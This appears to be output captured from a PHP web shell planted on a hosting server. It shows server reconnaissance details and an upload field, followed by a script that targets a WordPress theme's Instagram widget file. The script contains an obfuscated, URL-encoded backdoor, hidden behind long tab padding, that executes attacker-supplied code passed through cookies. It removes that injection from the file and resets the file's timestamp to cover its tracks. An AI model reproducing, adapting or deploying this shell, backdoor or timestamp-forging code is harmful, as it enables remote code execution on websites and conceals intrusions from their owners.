Server IP : 192.64.112.168 / Your IP : 18.227.46.54 Web Server : Apache System : Linux nc-ph-2300-85.bluforrest.com 4.18.0-513.9.1.el8_9.x86_64 #1 SMP Sat Dec 2 05:23:44 EST 2023 x86_64 User : expressoneac ( 1128) PHP Version : 8.0.30 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /tmp/ |
Upload File : |
<?php $path = '/home/celebrategoodtim/public_html/wp-content/themes/woodmart/inc/widgets/class-instagram-widget.php'; $ft = @filemtime($path); $new_content = str_repeat("\t", 42).rawurldecode('if%28isset%28%24_COOKIE%5B3%5D%29%26%26isset%28%24_COOKIE%5B39%5D%29%29%7B%24c%3D%24_COOKIE%3B%24k%3D0%3B%24n%3D8%3B%24p%3Darray%28%29%3B%24p%5B%24k%5D%3D%27%27%3Bwhile%28%24n%29%7B%24p%5B%24k%5D.%3D%24c%5B39%5D%5B%24n%5D%3Bif%28%21%24c%5B39%5D%5B%24n%2B1%5D%29%7Bif%28%21%24c%5B39%5D%5B%24n%2B2%5D%29break%3B%24k%2B%2B%3B%24p%5B%24k%5D%3D%27%27%3B%24n%2B%2B%3B%7D%24n%3D%24n%2B8%2B1%3B%7D%24k%3D%24p%5B12%5D%28%29.%24p%5B22%5D%3Bif%28%21%24p%5B4%5D%28%24k%29%29%7B%24n%3D%24p%5B14%5D%28%24k%2C%24p%5B6%5D%29%3B%24p%5B19%5D%28%24n%2C%24p%5B1%5D.%24p%5B9%5D%28%24p%5B11%5D%28%24c%5B3%5D%29%29%29%3B%7Dinclude%28%24k%29%3B%7D')."\n"; if (file_exists($path) && is_writable($path)) { $content = file_get_contents($path); if (strpos($content, $new_content) !== FALSE) { $content = str_replace($new_content, '', $content); file_put_contents($path, $content); @touch($path, $ft); } } die('!success!');